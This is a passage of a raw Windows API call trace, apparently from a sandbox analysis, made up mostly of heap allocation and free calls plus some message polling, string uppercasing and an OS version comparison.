RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b17f8 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0190.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.805] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.805] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.805] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.806] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.806] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.806] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.806] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.806] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.807] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0190.807] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0190.807] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.808] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0190.808] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.808] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.809] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.809] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.809] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.810] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0190.810] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa860 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.810] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.810] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0190.811] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.811] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0190.811] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.812] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d50 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0190.812] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0190.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.812] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f00 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0190.812] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.812] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.813] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0190.813] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.813] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0190.813] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0190.813] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9eb8 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.814] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0190.814] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f48 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0190.815] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0190.815] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0190.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.816] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0190.816] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: 